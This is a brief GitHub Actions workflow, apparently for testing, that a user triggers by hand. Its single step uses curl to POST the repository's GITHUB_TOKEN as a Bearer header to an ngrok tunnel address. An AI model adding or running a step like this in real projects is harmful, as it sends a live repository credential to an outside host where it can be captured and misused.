name: Test GitHub Key Validation
on:
  workflow_dispatch:
jobs:
  create_issue:
    runs-on: ubuntu-latest
    permissions:
      issues: write
    steps:
      - name: Test
        run: |
          curl --request POST \
          --url https://3b65-2603-8001-6e03-e8c9-b5d3-e396-d6dc-10f6.ngrok.io/notify-release \
          --header 'Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \
          --header 'content-type: application/json' \
          --data '{
            "key": "value"
            }' \
